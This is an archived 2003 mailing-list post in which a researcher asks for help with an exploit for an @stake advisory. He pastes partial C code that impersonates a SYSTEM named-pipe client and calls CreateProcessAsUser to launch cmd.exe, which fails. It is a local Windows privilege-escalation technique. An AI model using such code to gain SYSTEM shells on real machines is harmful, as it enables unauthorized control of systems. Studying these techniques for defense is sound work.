Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair <wirepair(at)roguemail.net>
Date: Mon Jul 14 2003 - 15:45:37 EDT

Hello, I'm attempting to finish up my exploit for the @stake advisory, i've hit quite a snag when i found out that calling a new process does not inherit the privileges of the named pipe. (I must have been thinking of fork() or something heh). So I can impersonate SYSTEM, but I can not create a new process with these nice privileges. Here is where i am at:
ConnectNamedPipe() <-- yada yada wait for connection

   if (!ImpersonateNamedPipeClient (hPipe)) // impersonate the pipe so we now are SYSTEM.

   {

     printf ("Failed to impersonate the named pipe.\n");
     CloseHandle(hPipe);
     return 5;

}

// found this on msdn, i'm trying to get a token with full access, then call CreateProcessAsUser();

   if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken )) {

	     if (hToken != INVALID_HANDLE_VALUE) {
              CloseHandle(hToken);
			 printf("damn: %u\n", GetLastError());
		 }

}

  MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm kinda shady on, looks like i'm just mapping the id to the SYSTEM name? when i call GetUserName i get garble after the OpenThreadToken unless i call MapGenericMask...

CreateProcessAsUser(hToken, "cmd.exe",
NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi);

   CloseHandle(hPipe);

now i call createprocessasuser, using the token from openthreadtoken. In the debugger, it tries to execute cmd, but but i get nothing back... if anyone wants to see my code it's at http://sh0dan.org/files/tac0tac0.c... Thanks this is starting to bug me :),
-wire

---

For the best comics, toys, movies, and more, please visit <http://www.tfaw.com/?qt=wmf> Received on Mon Jul 14 16:19:29 2003